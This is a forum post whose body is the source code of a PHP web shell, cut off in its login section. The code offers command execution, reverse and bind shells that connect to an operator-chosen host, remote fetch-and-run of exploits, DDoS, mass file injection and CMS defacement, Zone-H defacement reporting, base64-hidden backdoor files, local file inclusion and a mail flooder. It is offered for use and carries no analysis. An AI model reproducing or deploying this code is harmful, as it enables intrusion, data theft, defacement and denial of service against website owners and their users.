pinacolada Posted March 17, 2013 Share Posted March 17, 2013 <?php // ================================ // if user is logged in if(isset($_*******['loggedin']) && !empty($_*******['loggedin'])){ // welcome user echo " Server: ".gethostbyname($_SERVER["HTTP_HOST"])." You: ".$_SERVER['REMOTE_ADDR']." Php: ".phpversion()." Apache: ".$_SERVER['SERVER_SOFTWARE']." OS: ".php_uname().""; ?> home files php.ini upload encoders bind exploit symlink eval mass proc zone-h ddos mysql tools phpinfo log out kill <?php if(ini_get('safe_mode') == '1'){ echo ' Safe mode: ON'; } else{ echo ' Safe mode: OFF'; } if(ini_get('magic_quotes_gpc') == '1'){ echo ' Magic_quotes_gpc: ON Turn off'; } else{ echo ' Magic_quotes_gpc: OFF'; } if(function_exists('mysql_connect')){ echo ' Mysql: ON'; } else{ echo ' Mysql: OFF'; } if(function_exists('mssql_connect')){ echo ' Mssql: ON'; } else{ echo ' Mssql: OFF'; } if(function_exists('pg_connect')){ echo ' PostgreSQL: ON'; } else{ echo ' PostgreSQL: OFF'; } if(function_exists('ocilogon')){ echo ' Oracle: ON'; } else{ echo ' Oracle: OFF'; } if(function_exists('curl_version')){ echo ' Curl: ON'; } else{ echo ' Curl: OFF'; } if(function_exists('exec')){ echo ' Exec: ON'; } else{ echo ' Exec: OFF'; } if(!ini_get('open_basedir') != "on"){ echo ' Open_basedir: OFF'; } else{ echo ' Open_basedir: ON'; } if(!ini_get('ini_restore') != "on"){ echo ' Ini_restore: OFF'; } else{ echo ' Ini_restore: ON'; } ?> <?php echo ' Disable_functions: '; if(ini_get('disable_functions') == ''){ echo ' None'; } else{ echo ''; echo ini_get('disable_functions'); echo ''; } ?> <?php if(isset($_POST['source']) && isset($_POST['file'])){ $source = $_POST['source']; $file = $_POST['file']; $fp = fopen($file, 'w'); fwrite($fp, $source); fclose($fp); echo 'File saved'; } if(isset($_GET['turnoff'])){ if(is_writable(".htaccess")){ $value = $_GET['turnoff']; if(file_exists(".htaccess")){ // fread example $handle = fopen(".htaccess", "r"); $contents = ''; while (!feof($handle)) { $read = 
fread($handle, 8192); $contents = $contents.$read; ?> Use htaccess to turn php.ini functions on/offExample: php_value magic_quotes_gpc off <?php if($value == 'magic_quotes_gpc'){ $data = 'php_value magic_quotes_gpc off '.$contents; echo $data; } else{ echo $contents; } ?> <?php } fclose($handle); } } if(!file_exists(".htaccess")){ // make htaccess file $myfile = '.htaccess'; $handle = fopen($myfile, 'w') or die('Cannot open file: '.$myfile); fclose($handle); echo ' File created click here '; } ?> <?php } // make file if(isset($_GET['make'])){ // file maker if(!file_exists($_GET['make'])){ // make htaccess file $myfile = $_GET['make']; $handle = fopen($myfile, 'w') or die('Cannot open file: '.$myfile); fclose($handle); echo ' File created click here '; } else{ echo ' This file exist. delete open'; } } if(isset($_GET['get'])){ // download $file = $_GET['get']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . 
filesize($file)); ob_clean(); flush(); readfile($file); exit(); } } if(isset($_GET['view'])){ $file = $_GET['view']; ?> <?php if(file_exists($file)){ $open = htmlspecialchars(file_get_contents($file)); if($open){ echo $open; } } else{ echo ' FILE DOES NOT EXISTS'; } ?> Download Delete <?php } if(isset($_GET['action']) && $_GET['action'] == 'symlink'){ $a = fopen("lolz.pl", "w"); fputs($a, $symlink); fclose($a); system("perl lolz.pl"); } if(isset($_GET['action']) && $_GET['action'] == 'ddos' && empty($_POST['ip'])){ ?> ~Ddos~ TCP UDP <?php } if(isset($_GET['action']) && $_GET['action'] == 'ddos' && !empty($_POST['ip'])){ $url = $_POST['ip']; if($_POST['way'] == "TCP"){ DDOSTcp($url); } else if($_POST['way'] == "UDP"){ DDOSUdp($url); } else{ echo 'No other methods.'; } } if(isset($_GET['action']) && $_GET['action'] == 'eval'){ ?> ~Eval~ <?php if(isset($_GET['evalit'])){ if(function_exists("system")){ $ev = $_GET['evalit']; echo eval(stripslashes($ev)); } else{ echo 'eval disabled'; } } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'exploit'){ ?> ~Get and execute~ Type: c++ | .cpp python | .py perl | .pl ruby | .rb <?php } if(isset($_GET['exp_url'])){ echo ''; if(function_exists("wget")){ wget($_GET['exp_url']); echo $_GET['exp_url'].' 
got in here'; if(function_exists("system")){ if(isset($_GET['run'])){ $run = $_GET['run']; if($run = 'c++ | .cpp'){ system("gcc -o exploit ".$_GET['exp_url'].";chmod +x exploit;./exploit;"); } if($run = 'perl | .pl'){ } if($run = 'python | .py'){ } if($run = 'ruby | .rb'){ } } } else{ echo 'System command disabled'; } } else{ echo('wget disabled'); } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'bind'){ if(!isset($_POST['port']) && empty($_POST['ip']) && empty($_POST['pyip']) && empty($_POST['rbip'])){ echo "#1 ./perl"; echo ' #2 ./bash #3 ./python #4 ./ruby linux #5 ./ruby win '; } else{ if(isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } "; $fp = fopen("bind.pl", "w"); fwrite($fp, $bind); fclose($fp); exec("perl bind.pl"); } if(isset($_POST['rbip'])){ $ip = $_POST['rbip']; $port = $_POST['rbport']; $ruby = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"; $fp = fopen("bind.rb", "w"); fwrite($fp, $ruby); fclose($fp); exec("ruby bind.rb"); } if(isset($_POST['rbipw'])){ $ip = $_POST['rbipw']; $port = $_POST['rbportw']; $ruby = "ruby -rsocket -e 'c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"; $fp = fopen("bind_win.rb", "w"); fwrite($fp, $ruby); fclose($fp); exec("ruby bind_win.rb"); } if(isset($_POST['pyip'])){ $ip = $_POST['pyip']; $port = $_POST['pyport']; $bind = "python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"".$ip."\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"; $fp = fopen("bind.py", "w"); fwrite($fp, $bind); fclose($fp); exec("python bind.py"); } if(isset($_POST['ip']) && !empty($_POST['theport'])) { $ip = $_POST['ip']; $port = $_POST['theport']; if(function_exists('exec')){ echo 'Exec command not blocked,,,, continuing'; exec('0<&196;exec 196<>/dev/tcp/.$ip./.$port.; sh <&196 >&196 2>&196'); } else{ echo 'Exec command is blocked blocked by admin'; } } } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'proc'){ ?> <?php echo shell_exec("tasklist").""; ?> <?php } if(isset($_GET['action']) && $_GET['action'] == 'mass'){ if(!isset($_GET['code'])){ ?> <?php echo ' Mass deface script, php/html/htm/asp/aspx/js YOUR DEFACE PAGE HERE =) Folder: '; } else{ if (is_dir($_GET['dir'])) { $lolinject = $_GET['code']; foreach (glob($_GET['dir']."/*.php") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.html") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.htm") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.asp") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.js") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' 
was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.aspx") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } } else { //end if inputted dir is real -- if not, show an ugly red error echo ''.$_GET['pathtomass'].' is not available!'; } // end if inputted dir is real, for real this time } } if(isset($_GET['action']) && $_GET['action'] == 'encoders'){ ?> Enc0d3 ~ D3c0d3 code here Base64_encode Base64_decode Urlencode Urldecode Hash_md5 Hash_sha1 Hash_sha512 <?php if(isset($_GET['action']) && $_GET['action'] == 'encoders' && !empty($_POST['code']) && !empty($_POST['encoded'])){ $format = $_POST['encoded']; $code = $_POST['code']; if($format == 'Base64_encode'){ echo base64_encode($code); } if($format == 'Base64_decode'){ echo base64_decode($code); } if($format == 'Urlencode'){ echo urlencode($code); } if($format == 'Urldecode'){ echo urldecode($code); } if($format == 'Hash_md5'){ echo md5($code); } if($format == 'Hash_sha1'){ echo sha1($code); } if($format == 'Hash_sha512'){ echo hash('sha512', $code); } } ?> <?php } if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 1){ ?> host user pass <?php } if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 2){ $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); $query = mysql_query('SHOW DATABASES'); echo ' Database'; while($rows=mysql_fetch_array($query)){ for($j=0;$j'; } } echo $result; echo ' '; mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 3){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); $db = $_GET['db']; $sql = "SHOW TABLES FROM ".$db; $result = mysql_query($sql); while 
($row = mysql_fetch_row($result)) { echo ' '.$row[0].' '; } mysql_free_result($result); mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 4 && empty($_GET['column']) && !empty($_GET['table'])){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); mysql_select_db($_GET['db']) or die('Unable to select db'); $query = mysql_query("SHOW COLUMNS FROM ".$_GET['table']); while ($row = mysql_fetch_row($query)) { echo ' '.$row[0].' '; } mysql_free_result($query); mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 5 && !empty($_GET['column'])){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); mysql_select_db($_GET['db']) or die('Unable to select db'); $query = mysql_query("SELECT ".$_GET['column']." FROM ".$_GET['table']); echo ""; while($row = mysql_fetch_array($query)){ echo htmlspecialchars($row[$_GET['column']])."\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; } echo " "; } // tools if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){ if($_POST['SendNowToZoneH']) { echo ''; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");} elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");} elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");} elseif(empty($site)) {die("[-] You Must Inter the Sites List ! 
");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];} ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! "; } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'zone-h'){ ?> Zone-H Defacer --------SELECT-------- known vulnerability (i.e. unpatched system) undisclosed (new) vulnerability configuration / admin. mistake brute force attack social engineering Web Server intrusion Web Server external module intrusion Mail Server intrusion FTP Server intrusion SSH Server intrusion Telnet Server intrusion RPC Server intrusion Shares misconfiguration Other Server intrusion SQL Injection URL Poisoning File Inclusion Other Web Application bug Remote administrative panel access bruteforcing Remote administrative panel access password guessing Remote administrative panel access social engineering Attack against administrator(password stealing/sniffing) Access credentials through Man In the Middle attack Remote service password guessing Remote service password bruteforce Rerouting after attacking the Firewall Rerouting after attacking the Router DNS attack through social engineering DNS attack through cache poisoning Not available --------SELECT-------- Heh...just for fun! 
Revenge against that website Political reasons As a challenge I just want to be the best defacer Patriotism Not available List Of Domains <?php } if(isset($_GET['action']) && $_GET['action'] == 'tools'){ ?> Cloudflare Ip finder ./x-h4ck CMS Fack wp/mybb/vb Some deface shit in here :P wpmybbvb vb = update faq, calendar, searchwp = update wordpress postsmybb = update mybb index <?php if(isset($_GET['folder'])){ $chemin=$_GET['folder']; $files = glob("$chemin*"); echo "Trying To List Folder $chemin"; foreach ($files as $filename) { echo ""; echo "$filename\n"; echo ""; } } else{ ?> List Directory <?php } if(isset($_GET['hex'])){ echo '0x'.bin2hex($_GET['hex']).''; } else{ ?> Text 2 Hex <?php } ?> <?php if(isset($_GET['lfi'])){ include($_GET['lfi']); } else{ ?> LFI Dude <?php } ?> Mail sender Subject: From: To: Body:We made some changes recent days and.. Times: <?php if(isset($_GET['cook'])){ $a = fopen("oncha.php", "w"); fputs($a, $o); fclose($a); } if(isset($_GET['s-option'])){ $op = $_GET['s-option']; if($op == ".htaccess"){ $o = stripslashes(base64_decode("IyBPdmVycmlkZSBkZWZhdWx0IGRlbnkgcnVsZSB0byBtYWtlIC5odGFjY2VzcyBmaWxlIGFjY2Vzc2libGUgb3ZlciB3ZWINCjxGaWxlcyB+IFwiXlxcLmh0XCI+DQpPcmRlciBhbGxvdyxkZW55DQpBbGxvdyBmcm9tIGFsbA0KPC9GaWxlcz4NCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmh0YWNjZXNzDQoNCiMjIyMjIyBTSEVMTCAjIyMjIyMgPD9waHAgZWNobyBcIlxcblwiO3Bhc3N0aHJ1KCRfR0VUW1wnY1wnXS5cIiAyPiYxXCIpOyA/PiMjIyMjIyBMTEVIUyAjIyMjIyM=")); $a = fopen(".htaccess", "w"); fputs($a, $o); fclose($a); echo 'Visit '.$_SERVER['HTTP_HOST'].'/.htaccess?c='; } else{ $o = stripslashes(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW1wnY1wnXSk7ID8+")); $a = fopen("dfgdfg.php", "w"); fputs($a, $o); fclose($a); echo 'Visit '.$_SERVER['HTTP_HOST'].'/dfgdfg.php?c='; } } else{ ?> Hide Shell .htaccess .php <?php } if(isset($_GET['fp'])){ $filepath = $_GET['fp']; $sitepath = $_GET['sp']; $writeblefilepath = 'myfile.txt'; $flib=$sitepath.$writeblefilepath; @unlink($flib); symlink($filepath, $flib); echo 
readlink($flib)."\n"; echo "".file_get_contents("http://".$_SERVER['HTTP_HOST']."/".$writeblefilepath).""; @unlink($flib); } else{ ?> Symlink #2 __First tool File path: Site path: <?php } ?> <?php if(isset($_POST['site'])){ /* FAK CLOUDFLARE, pirate.al, flashcrew.in, devilzc0de.org h4x0rs.net */ $fuckcloud = dns_get_record($_POST['site'], DNS_TXT); print_r($fuckcloud); } if(isset($_POST['subjekti'])){ $subject = $_POST['subjekti']; $email = $_POST['email']; $to = $_POST['to']; $comments = $_POST['arsyeja']; $times = $_POST['times']; for($i=0;$i<$times;$i++){ if(mail("$to", "$subject", "$comments", "From: $email")){ echo " Sent."; } else{ echo " Not sent!"; }}} if(isset($_POST['index'])){ $index = mysql_real_escape_string($_POST['index']); $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $tab = $_POST['tab']; mysql_connect($host, $user, $pass); mysql_select_db($db); $cat = $_POST['cat']; if($cat == 'wp'){ mysql_query("UPDATE ".$tab."posts SET post_title='".$index."'"); echo 'All posts updated :)'; } if($cat == 'mybb'){ mysql_query("UPDATE ".$tab."templates SET template='".$index."'"); echo 'Index f@cked :)'; } if($cat == 'vb'){ mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='faq'"); echo 'faq f@cked :)'; mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='calendar'"); echo 'calendar f@cked :)'; mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='search'"); echo 'search f@cked :)'; } } echo ''; } ?> <?php if(isset($_GET['action']) && $_GET['action'] == 'files'){ ?> Change directory Make directory <?php // delete if(isset($_GET['delete']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $file = $_GET['delete']; // if exist if(is_dir($file) || file_exists($file)){ // if file del if(!is_dir($file)){ unlink($file); echo 'File deleted'; } if(is_dir($file)){ function rmdirs($d) { $f = glob($d . 
'*', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } rmdirs($file); echo 'Folder deleted'; } } else{ echo 'File or folder does not exist'; } } // rename if(isset($_GET['old_name']) && !empty($_GET['rename_file']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $old = $_GET['old_name']; $new = $_GET['rename_file']; // if new file or folder exist if(is_dir($new) || file_exists($new)){ echo ' File or folder exists. delete'; } else{ // if file or folder exist if(is_dir($old) || file_exists($old)){ if(rename($old, $new)){ if(is_dir($old)){ echo "Folder renamed sucsessfuly to ".$new.", open"; } if(!is_dir($old)){ echo "File renamed sucsessfuly to ".$new.", open"; } } else{ echo "Problem renaming ".$old.""; } } else{ echo ' File or folder not found.'; } } } if(isset($_GET['rename']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $file = $_GET['rename']; ?> Old Name: Rename to: <?php } // new dir if(isset($_GET['go']) && !empty($_GET['newdir']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $dir = $_GET['go']; $new = $_GET['newdir']; $currect = getcwd(); // if dir is dir if(is_dir($dir)){ // if dir exist if(is_dir($new)){ echo ' Directory exist. delete'; } else{ if(mkdir($new)){ echo ' Directory created'; } else{ echo ' Problem creating directory'; } if(!is_dir($dir)){ chdir($go); if(mkdir($new)){ echo ' Directory created'; } else{ echo ' Problem creating directory'; } } } } } // file browser $self = $_SERVER['PHP_SELF']; $dir = getcwd(); if(isset($_GET['go'])) { $dir = $_GET['go']; } if(is_dir($dir)) { $handle = opendir($dir); { showDrives(); ?> «back forward » <?php if($dir[(strlen($dir)-1)] != '/'){$dir = $dir.'/';} while (($file = readdir($handle)) != false) { if ($file != "." 
&& $file != "..") { $color = 'red'; if(is_readable($dir.$file)) { $color = 'yellow'; } if(is_writable($dir.$file)) { $color = '#00ff00'; } if(is_dir($dir.$file)) { ?> [ <?php echo $file ?> ] <?php echo HumanReadableFilesize(dirSize($dir.$file));?> <?php echo getFilePermissions($dir.$file);?> > <?php echo getperms($dir); ?> Delete Rename Download Upload <?php } //Its a file else { ?> ;" href='<?php echo $self ?>?view=<?php echo $dir.$file ?>'><?php echo $file ?> <?php echo HumanReadableFilesize(filesize($dir.$file));?> <?php echo getFilePermissions($dir.$file);?> > <?php echo getperms($dir.$file); ?> Delete Rename Download <?php } } } closedir($handle); } } else { echo "Permission Denied"; } ?> <?php } ?> <?php if(!isset($_GET['action']) && !isset($_GET['upload']) && !isset($_GET['get']) && !isset($_GET['turnoff']) && !isset($_GET['view']) && !isset($_GET['db'])){ ?> Execute command Ready commands whoami netstat -an ls -la ls uname -a dir start cmd.exe cat /etc/passwd cat /etc/hosts Create file Chmod file ~~~~ chmod chown chgrp Passthru Exec Popen <?php } if(isset($_GET['thepass'])){ echo ''; passthru($_GET['thepass']); echo ''; } if(isset($_GET['theexec'])){ echo ''; if(!function_exists('exec')){ die('Exec command is blocked blocked by admin'); } else{ echo exec($_GET['theexec']); echo ''; } } if(isset($_GET['popen'])){ echo ''; if(!function_exists('popen')){ die('Popen command is blocked blocked by admin'); } else{ popen($_GET['popen'], "r"); echo ''; } } if(isset($_GET['thefile'])){ $file = $_GET['thefile']; $new = $_GET['thefileval']; if($_GET['comm'] == 'chmod') { $ch_ok = chmod($file,$new); echo "Permission Changed."; } else if($_GET['comm'] == 'chown') { $ch_ok = chown($file,$new); echo "Owner Changed."; } else if($_GET['comm'] == 'chgrp') { $ch_ok = chgrp($file,$new); echo "Group Changed."; } } if(isset($_FILES['upload'])){ //file upload echo ''; if(isset($_POST['location']) && !empty($_POST['location'])){ $target_path = $_POST['location']; $target_path = 
$target_path.'/'; } else{ $target_path = ""; } echo "File ".basename($_FILES["upload"]["name"])." uploaded."; if(move_uploaded_file($_FILES["upload"]["tmp_name"], $target_path . $_FILES["upload"]["name"])){ echo "The file ".basename($_FILES["upload"]["name"]). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } echo ''; } if(isset($_GET['dirmake'])){ // change directory $dir = $_GET['dirmake']; ?>Command executed <?php echo 'Last dir: '.getcwd() . ""; chdir($dir); // current directory echo 'New dir: '.getcwd() . ""; ?> <?php } if(isset($_GET['command'])){ $command = $_GET['command']; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { if(preg_match("/ls/", $command)||preg_match("/cat/", $command)||preg_match("/grep/", $command)||preg_match("/wget/", $command)||preg_match("/apt-get/", $command)||preg_match("/install/", $command)||preg_match("/mkdir/", $command)){ echo 'This command dont work on windows! '; } } if (strtoupper(substr(PHP_OS, 0, 3)) === 'UNI') { if(preg_match("/ls/", $command)||preg_match("/tree/", $command)||preg_match("/cd../", $command)){ echo 'This command dont work on linux! '; } } ?> <?php system($command); ?> <?php } ?> <?php // ============================ // get action // ============================ if(isset($_GET['action']) && !empty($_GET['action'])){ $action = $_GET['action']; if($action == "phpinfo"){ phpinfo(); } if($action == 'upload'){ ?> Upload file Upload to <?php } if($action == "kill"){ echo 'Do you really want to delete this shell ? '; ?> Yes No <?php } if($action == "killit"){ $file = $_SERVER['PHP_SELF']; $file = str_replace('/', '', $file); unlink($file); echo 'Bitch u killed me o.O'; header('refresh: 2; '.$_SERVER['PHP_SELF'].''); } if($action == "logout"){ unset($_*******['loggedin']); echo 'Logged out.'; } } } // ================================ // else login else{ if(isset($_*******['banned'])){ if($_*******['banned'] == '3'){ die($about.' 